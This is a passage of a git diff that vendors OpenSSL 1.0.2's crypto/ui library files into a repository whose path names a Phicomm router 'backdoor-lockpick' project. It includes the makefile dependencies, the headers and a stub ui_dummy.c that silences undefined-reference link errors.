+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ui_compat.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ui_compat.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ui_compat.o: ../../include/openssl/stack.h ../../include/openssl/ui.h
+ui_compat.o: ../../include/openssl/ui_compat.h ui_compat.c
+ui_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+ui_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ui_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+ui_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ui_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ui_err.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h ui_err.c
+ui_lib.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ui_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+ui_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ui_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ui_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ui_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ui_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ui_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+ui_lib.o: ../cryptlib.h ../evp/evp.h ui_dummy.c ui_lib.c ui_locl.h
+ui_util.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ui_util.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ui_util.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ui_util.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ui_util.o: ../../include/openssl/ui.h ui_locl.h ui_util.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui.h
new file mode 100644
index 0000000..b917eda
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui.h
@@ -0,0 +1,415 @@
+/* crypto/ui/ui.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_UI_H
+# define HEADER_UI_H
+
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/crypto.h>
+# endif
+# include <openssl/safestack.h>
+# include <openssl/ossl_typ.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Declared already in ossl_typ.h */
+/* typedef struct ui_st UI; */
+/* typedef struct ui_method_st UI_METHOD; */
+
+/*
+ * All the following functions return -1 or NULL on error and in some cases
+ * (UI_process()) -2 if interrupted or in some other way cancelled. When
+ * everything is fine, they return 0, a positive value or a non-NULL pointer,
+ * all depending on their purpose.
+ */
+
+/* Creators and destructor.   */
+UI *UI_new(void);
+UI *UI_new_method(const UI_METHOD *method);
+void UI_free(UI *ui);
+
+/*-
+   The following functions are used to add strings to be printed and prompt
+   strings to prompt for data.  The names are UI_{add,dup}_<function>_string
+   and UI_{add,dup}_input_boolean.
+
+   UI_{add,dup}_<function>_string have the following meanings:
+        add     add a text or prompt string.  The pointers given to these
+                functions are used verbatim, no copying is done.
+        dup     make a copy of the text or prompt string, then add the copy
+                to the collection of strings in the user interface.
+        <function>
+                The function is a name for the functionality that the given
+                string shall be used for.  It can be one of:
+                        input   use the string as data prompt.
+                        verify  use the string as verification prompt.  This
+                                is used to verify a previous input.
+                        info    use the string for informational output.
+                        error   use the string for error output.
+   Honestly, there's currently no difference between info and error for the
+   moment.
+
+   UI_{add,dup}_input_boolean have the same semantics for "add" and "dup",
+   and are typically used when one wants to prompt for a yes/no response.
+
+   All of the functions in this group take a UI and a prompt string.
+   The string input and verify addition functions also take a flag argument,
+   a buffer for the result to end up with, a minimum input size and a maximum
+   input size (the result buffer MUST be large enough to be able to contain
+   the maximum number of characters).  Additionally, the verify addition
+   functions takes another buffer to compare the result against.
+   The boolean input functions take an action description string (which should
+   be safe to ignore if the expected user action is obvious, for example with
+   a dialog box with an OK button and a Cancel button), a string of acceptable
+   characters to mean OK and to mean Cancel.  The two last strings are checked
+   to make sure they don't have common characters.  Additionally, the same
+   flag argument as for the string input is taken, as well as a result buffer.
+   The result buffer is required to be at least one byte long.  Depending on
+   the answer, the first character from the OK or the Cancel character strings
+   will be stored in the first byte of the result buffer.  No NUL will be
+   added, so the result is *not* a string.
+
+   On success, the all return an index of the added information.  That index
+   is usefull when retrieving results with UI_get0_result(). */
+int UI_add_input_string(UI *ui, const char *prompt, int flags,
+                        char *result_buf, int minsize, int maxsize);
+int UI_dup_input_string(UI *ui, const char *prompt, int flags,
+                        char *result_buf, int minsize, int maxsize);
+int UI_add_verify_string(UI *ui, const char *prompt, int flags,
+                         char *result_buf, int minsize, int maxsize,
+                         const char *test_buf);
+int UI_dup_verify_string(UI *ui, const char *prompt, int flags,
+                         char *result_buf, int minsize, int maxsize,
+                         const char *test_buf);
+int UI_add_input_boolean(UI *ui, const char *prompt, const char *action_desc,
+                         const char *ok_chars, const char *cancel_chars,
+                         int flags, char *result_buf);
+int UI_dup_input_boolean(UI *ui, const char *prompt, const char *action_desc,
+                         const char *ok_chars, const char *cancel_chars,
+                         int flags, char *result_buf);
+int UI_add_info_string(UI *ui, const char *text);
+int UI_dup_info_string(UI *ui, const char *text);
+int UI_add_error_string(UI *ui, const char *text);
+int UI_dup_error_string(UI *ui, const char *text);
+
+/* These are the possible flags.  They can be or'ed together. */
+/* Use to have echoing of input */
+# define UI_INPUT_FLAG_ECHO              0x01
+/*
+ * Use a default password.  Where that password is found is completely up to
+ * the application, it might for example be in the user data set with
+ * UI_add_user_data().  It is not recommended to have more than one input in
+ * each UI being marked with this flag, or the application might get
+ * confused.
+ */
+# define UI_INPUT_FLAG_DEFAULT_PWD       0x02
+
+/*-
+ * The user of these routines may want to define flags of their own.  The core
+ * UI won't look at those, but will pass them on to the method routines.  They
+ * must use higher bits so they don't get confused with the UI bits above.
+ * UI_INPUT_FLAG_USER_BASE tells which is the lowest bit to use.  A good
+ * example of use is this:
+ *
+ *    #define MY_UI_FLAG1       (0x01 << UI_INPUT_FLAG_USER_BASE)
+ *
+*/
+# define UI_INPUT_FLAG_USER_BASE 16
+
+/*-
+ * The following function helps construct a prompt.  object_desc is a
+ * textual short description of the object, for example "pass phrase",
+ * and object_name is the name of the object (might be a card name or
+ * a file name.
+ * The returned string shall always be allocated on the heap with
+ * OPENSSL_malloc(), and need to be free'd with OPENSSL_free().
+ *
+ * If the ui_method doesn't contain a pointer to a user-defined prompt
+ * constructor, a default string is built, looking like this:
+ *
+ *       "Enter {object_desc} for {object_name}:"
+ *
+ * So, if object_desc has the value "pass phrase" and object_name has
+ * the value "foo.key", the resulting string is:
+ *
+ *       "Enter pass phrase for foo.key:"
+*/
+char *UI_construct_prompt(UI *ui_method,
+                          const char *object_desc, const char *object_name);
+
+/*
+ * The following function is used to store a pointer to user-specific data.
+ * Any previous such pointer will be returned and replaced.
+ *
+ * For callback purposes, this function makes a lot more sense than using
+ * ex_data, since the latter requires that different parts of OpenSSL or
+ * applications share the same ex_data index.
+ *
+ * Note that the UI_OpenSSL() method completely ignores the user data. Other
+ * methods may not, however.
+ */
+void *UI_add_user_data(UI *ui, void *user_data);
+/* We need a user data retrieving function as well.  */
+void *UI_get0_user_data(UI *ui);
+
+/* Return the result associated with a prompt given with the index i. */
+const char *UI_get0_result(UI *ui, int i);
+
+/* When all strings have been added, process the whole thing. */
+int UI_process(UI *ui);
+
+/*
+ * Give a user interface parametrised control commands.  This can be used to
+ * send down an integer, a data pointer or a function pointer, as well as be
+ * used to get information from a UI.
+ */
+int UI_ctrl(UI *ui, int cmd, long i, void *p, void (*f) (void));
+
+/* The commands */
+/*
+ * Use UI_CONTROL_PRINT_ERRORS with the value 1 to have UI_process print the
+ * OpenSSL error stack before printing any info or added error messages and
+ * before any prompting.
+ */
+# define UI_CTRL_PRINT_ERRORS            1
+/*
+ * Check if a UI_process() is possible to do again with the same instance of
+ * a user interface.  This makes UI_ctrl() return 1 if it is redoable, and 0
+ * if not.
+ */
+# define UI_CTRL_IS_REDOABLE             2
+
+/* Some methods may use extra data */
+# define UI_set_app_data(s,arg)         UI_set_ex_data(s,0,arg)
+# define UI_get_app_data(s)             UI_get_ex_data(s,0)
+int UI_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                        CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
+int UI_set_ex_data(UI *r, int idx, void *arg);
+void *UI_get_ex_data(UI *r, int idx);
+
+/* Use specific methods instead of the built-in one */
+void UI_set_default_method(const UI_METHOD *meth);
+const UI_METHOD *UI_get_default_method(void);
+const UI_METHOD *UI_get_method(UI *ui);
+const UI_METHOD *UI_set_method(UI *ui, const UI_METHOD *meth);
+
+/* The method with all the built-in thingies */
+UI_METHOD *UI_OpenSSL(void);
+
+/* ---------- For method writers ---------- */
+/*-
+   A method contains a number of functions that implement the low level
+   of the User Interface.  The functions are:
+
+        an opener       This function starts a session, maybe by opening
+                        a channel to a tty, or by opening a window.
+        a writer        This function is called to write a given string,
+                        maybe to the tty, maybe as a field label in a
+                        window.
+        a flusher       This function is called to flush everything that
+                        has been output so far.  It can be used to actually
+                        display a dialog box after it has been built.
+        a reader        This function is called to read a given prompt,
+                        maybe from the tty, maybe from a field in a
+                        window.  Note that it's called wth all string
+                        structures, not only the prompt ones, so it must
+                        check such things itself.
+        a closer        This function closes the session, maybe by closing
+                        the channel to the tty, or closing the window.
+
+   All these functions are expected to return:
+
+        0       on error.
+        1       on success.
+        -1      on out-of-band events, for example if some prompting has
+                been canceled (by pressing Ctrl-C, for example).  This is
+                only checked when returned by the flusher or the reader.
+
+   The way this is used, the opener is first called, then the writer for all
+   strings, then the flusher, then the reader for all strings and finally the
+   closer.  Note that if you want to prompt from a terminal or other command
+   line interface, the best is to have the reader also write the prompts
+   instead of having the writer do it.  If you want to prompt from a dialog
+   box, the writer can be used to build up the contents of the box, and the
+   flusher to actually display the box and run the event loop until all data
+   has been given, after which the reader only grabs the given data and puts
+   them back into the UI strings.
+
+   All method functions take a UI as argument.  Additionally, the writer and
+   the reader take a UI_STRING.
+*/
+
+/*
+ * The UI_STRING type is the data structure that contains all the needed info
+ * about a string or a prompt, including test data for a verification prompt.
+ */
+typedef struct ui_string_st UI_STRING;
+DECLARE_STACK_OF(UI_STRING)
+
+/*
+ * The different types of strings that are currently supported. This is only
+ * needed by method authors.
+ */
+enum UI_string_types {
+    UIT_NONE = 0,
+    UIT_PROMPT,                 /* Prompt for a string */
+    UIT_VERIFY,                 /* Prompt for a string and verify */
+    UIT_BOOLEAN,                /* Prompt for a yes/no response */
+    UIT_INFO,                   /* Send info to the user */
+    UIT_ERROR                   /* Send an error message to the user */
+};
+
+/* Create and manipulate methods */
+UI_METHOD *UI_create_method(char *name);
+void UI_destroy_method(UI_METHOD *ui_method);
+int UI_method_set_opener(UI_METHOD *method, int (*opener) (UI *ui));
+int UI_method_set_writer(UI_METHOD *method,
+                         int (*writer) (UI *ui, UI_STRING *uis));
+int UI_method_set_flusher(UI_METHOD *method, int (*flusher) (UI *ui));
+int UI_method_set_reader(UI_METHOD *method,
+                         int (*reader) (UI *ui, UI_STRING *uis));
+int UI_method_set_closer(UI_METHOD *method, int (*closer) (UI *ui));
+int UI_method_set_prompt_constructor(UI_METHOD *method,
+                                     char *(*prompt_constructor) (UI *ui,
+                                                                  const char
+                                                                  *object_desc,
+                                                                  const char
+                                                                  *object_name));
+int (*UI_method_get_opener(UI_METHOD *method)) (UI *);
+int (*UI_method_get_writer(UI_METHOD *method)) (UI *, UI_STRING *);
+int (*UI_method_get_flusher(UI_METHOD *method)) (UI *);
+int (*UI_method_get_reader(UI_METHOD *method)) (UI *, UI_STRING *);
+int (*UI_method_get_closer(UI_METHOD *method)) (UI *);
+char *(*UI_method_get_prompt_constructor(UI_METHOD *method)) (UI *,
+                                                              const char *,
+                                                              const char *);
+
+/*
+ * The following functions are helpers for method writers to access relevant
+ * data from a UI_STRING.
+ */
+
+/* Return type of the UI_STRING */
+enum UI_string_types UI_get_string_type(UI_STRING *uis);
+/* Return input flags of the UI_STRING */
+int UI_get_input_flags(UI_STRING *uis);
+/* Return the actual string to output (the prompt, info or error) */
+const char *UI_get0_output_string(UI_STRING *uis);
+/*
+ * Return the optional action string to output (the boolean promtp
+ * instruction)
+ */
+const char *UI_get0_action_string(UI_STRING *uis);
+/* Return the result of a prompt */
+const char *UI_get0_result_string(UI_STRING *uis);
+/*
+ * Return the string to test the result against.  Only useful with verifies.
+ */
+const char *UI_get0_test_string(UI_STRING *uis);
+/* Return the required minimum size of the result */
+int UI_get_result_minsize(UI_STRING *uis);
+/* Return the required maximum size of the result */
+int UI_get_result_maxsize(UI_STRING *uis);
+/* Set the result of a UI_STRING. */
+int UI_set_result(UI *ui, UI_STRING *uis, const char *result);
+
+/* A couple of popular utility functions */
+int UI_UTIL_read_pw_string(char *buf, int length, const char *prompt,
+                           int verify);
+int UI_UTIL_read_pw(char *buf, char *buff, int size, const char *prompt,
+                    int verify);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_UI_strings(void);
+
+/* Error codes for the UI functions. */
+
+/* Function codes. */
+# define UI_F_GENERAL_ALLOCATE_BOOLEAN                    108
+# define UI_F_GENERAL_ALLOCATE_PROMPT                     109
+# define UI_F_GENERAL_ALLOCATE_STRING                     100
+# define UI_F_UI_CTRL                                     111
+# define UI_F_UI_DUP_ERROR_STRING                         101
+# define UI_F_UI_DUP_INFO_STRING                          102
+# define UI_F_UI_DUP_INPUT_BOOLEAN                        110
+# define UI_F_UI_DUP_INPUT_STRING                         103
+# define UI_F_UI_DUP_VERIFY_STRING                        106
+# define UI_F_UI_GET0_RESULT                              107
+# define UI_F_UI_NEW_METHOD                               104
+# define UI_F_UI_SET_RESULT                               105
+
+/* Reason codes. */
+# define UI_R_COMMON_OK_AND_CANCEL_CHARACTERS             104
+# define UI_R_INDEX_TOO_LARGE                             102
+# define UI_R_INDEX_TOO_SMALL                             103
+# define UI_R_NO_RESULT_BUFFER                            105
+# define UI_R_RESULT_TOO_LARGE                            100
+# define UI_R_RESULT_TOO_SMALL                            101
+# define UI_R_UNKNOWN_CONTROL_COMMAND                     106
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_compat.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_compat.c
new file mode 100644
index 0000000..0ca5284
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_compat.c
@@ -0,0 +1,69 @@
+/* crypto/ui/ui_compat.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2001-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include <openssl/ui_compat.h>
+
+int _ossl_old_des_read_pw_string(char *buf, int length, const char *prompt,
+                                 int verify)
+{
+    return UI_UTIL_read_pw_string(buf, length, prompt, verify);
+}
+
+int _ossl_old_des_read_pw(char *buf, char *buff, int size, const char *prompt,
+                          int verify)
+{
+    return UI_UTIL_read_pw(buf, buff, size, prompt, verify);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_compat.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_compat.h
new file mode 100644
index 0000000..42fb9ff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_compat.h
@@ -0,0 +1,88 @@
+/* crypto/ui/ui.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_UI_COMPAT_H
+# define HEADER_UI_COMPAT_H
+
+# include <openssl/opensslconf.h>
+# include <openssl/ui.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*
+ * The following functions were previously part of the DES section, and are
+ * provided here for backward compatibility reasons.
+ */
+
+# define des_read_pw_string(b,l,p,v) \
+        _ossl_old_des_read_pw_string((b),(l),(p),(v))
+# define des_read_pw(b,bf,s,p,v) \
+        _ossl_old_des_read_pw((b),(bf),(s),(p),(v))
+
+int _ossl_old_des_read_pw_string(char *buf, int length, const char *prompt,
+                                 int verify);
+int _ossl_old_des_read_pw(char *buf, char *buff, int size, const char *prompt,
+                          int verify);
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_compat.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_compat.o
new file mode 100644
index 0000000000000000000000000000000000000000..7b915b9720876704a0437cbe294b8574bcc4eece
GIT binary patch
literal 1728
zcmbtT&2G~`5FR&$7HA<<9FU5TPl&&+9H@lo0lBS`sK}zIB;tftPGZ`M#E$H>Xpw+E
z0*}BW@CZCguN)CKgj8ni9oN}77Z_<h-+VjY?0R<hbJJ_hSr)Ka@C?o)W&uuW=h)4l
z3(K$szpmZ>{e$8HKzn<8!@k??rJ+jgr{b}2)*4UJENpyw<OpZ|UQUy29!DL=1sv@c
zU6=#-P8=_H12LKPVGpdMy0yBru=oWxNSa&O48SGriE|82hf|LJaUOo2O-&$CtLy;r
zysJr7E&Gc}j-nb|oF+4VVFtfAgQxCH+A@YKrG0V_?juiqFwI4xihqqf)nPsR(TsdZ
z4`n|ZjeRBhAfqH1%4j%{gCLP{;1A^Zy-ZYm8192?d%Ihkp4@G<UNt+iv$^FpC3JUW
zx3l9-C0A84lW|MgJt0qb<O+^IXSrP^5{-E34f8f)GQ3yW$O8PVYrs7JH;CkTr2HOw
z73cndQ5+0?p@Jg?V&E$uL@!A|U^hlVh+G({K;Ru-OO)S#r{n!F72`M>2eCQ^kyQu|
z<lERE1-zC2@;0jJE}J*aMUHGGcg5Fy+p9Q3J#&kU9DJk3pz(XUjF_~1LvPX~+8rFk
zn=fOJCM(Qb{~_j3&41N5P)jv=p9nMK^&c>yJ+IGx19`^f)Q{z$gw5RNI7hEpx2woJ
z(a0{C9B}`b?jfL>rv9r=aJ6S=>fhi*)%l%PoF8df&*xXQHm!9^AGDYHhv}`+8!`37
bnP-O-IC_1vk7oa_&(PO((IFKpnW_H^mJo@F

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_dummy.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_dummy.c
new file mode 100644
index 0000000..e781eab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_dummy.c
@@ -0,0 +1,66 @@
+
+#ifdef OPENSSL_NO_TTY
+
+#include <openssl/e_os2.h>
+#include <evp.h>
+#include "ui_locl.h"
+#include "cryptlib.h"
+
+int dummy_read_write_string(UI *ui, UI_STRING *uis);
+int dummy_open_close(UI *ui);
+
+UI_METHOD ui_dummy =
+	{
+	"Dummy user interface",
+	dummy_open_close,
+	dummy_read_write_string,
+	NULL,
+	dummy_read_write_string,
+	dummy_open_close,
+	NULL
+	};
+
+UI_METHOD *UI_OpenSSL(void)
+	{
+	return &ui_dummy;
+	}
+
+int dummy_open_close(UI *ui)
+	{
+	/* Pretend that opening and closing the dummy UI succeeds. */
+	return 1;
+	}
+
+int dummy_read_write_string(UI *ui, UI_STRING *uis)
+	{
+	/* Writing to and reading from the dummy UI is not possible. */
+	return 0;
+	}
+
+int UI_add_input_string(UI *ui, const char *prompt, int flags,
+    char *result_buf, int minsize, int maxsize) {
+  return 1;
+}
+
+int UI_add_verify_string(UI *ui, const char *prompt, int flags, 
+    char *result_buf, int minsize, int maxsize, 
+    const char *test_buf) {
+  return 1;
+}
+
+int UI_process(UI *ui) { return 1; }
+
+void UI_free(UI *ui) { return; }
+
+UI * UI_new(void) { return (UI *) NULL; }
+
+
+/*
+evp_key.c:(.text+0x99): undefined reference to `UI_new'
+/usr/bin/ld: evp_key.c:(.text+0xc4): undefined reference to `UI_add_input_string'
+/usr/bin/ld: evp_key.c:(.text+0xe9): undefined reference to `UI_add_verify_string'
+/usr/bin/ld: evp_key.c:(.text+0xf3): undefined reference to `UI_process'
+/usr/bin/ld: evp_key.c:(.text+0xff): undefined reference to `UI_free'
+*/
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_err.c
new file mode 100644
index 0000000..8097da8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ui/ui_err.c
@@ -0,0 +1,111 @@
+/* crypto/ui/ui_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
